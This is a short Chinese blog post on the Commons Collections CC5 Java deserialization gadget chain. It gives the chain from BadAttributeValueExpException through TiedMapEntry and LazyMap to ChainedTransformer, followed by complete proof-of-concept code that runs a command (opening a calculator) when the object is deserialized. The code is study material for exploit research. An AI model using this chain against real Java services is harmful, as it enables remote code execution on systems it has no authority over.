Java反序列化之CC5

这篇比较水，主要是这条链子思路比较简单

BadAttributeValueExpException.readobject()->TiedMapEntry.toString()->LazyMap.get()->ChainedTransformer.transform()

    public static void main(String argc[]) throws Exception {
        ChainedTransformer chainedTransformer = new ChainedTransformer(
                new Transformer[]{
                        new ConstantTransformer(Runtime.class),
                        new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                        new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                        new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"open -a calculator"})
                }
        );
        Map map = LazyMap.decorate(new HashMap<Object, Object>(), chainedTransformer);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(map, 1);

        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);

        Field field = BadAttributeValueExpException.class.getDeclaredField("val");
        field.setAccessible(true);
        field.set(badAttributeValueExpException, tiedMapEntry);

        serialize(badAttributeValueExpException);
        unserialize("ser.bin");
    }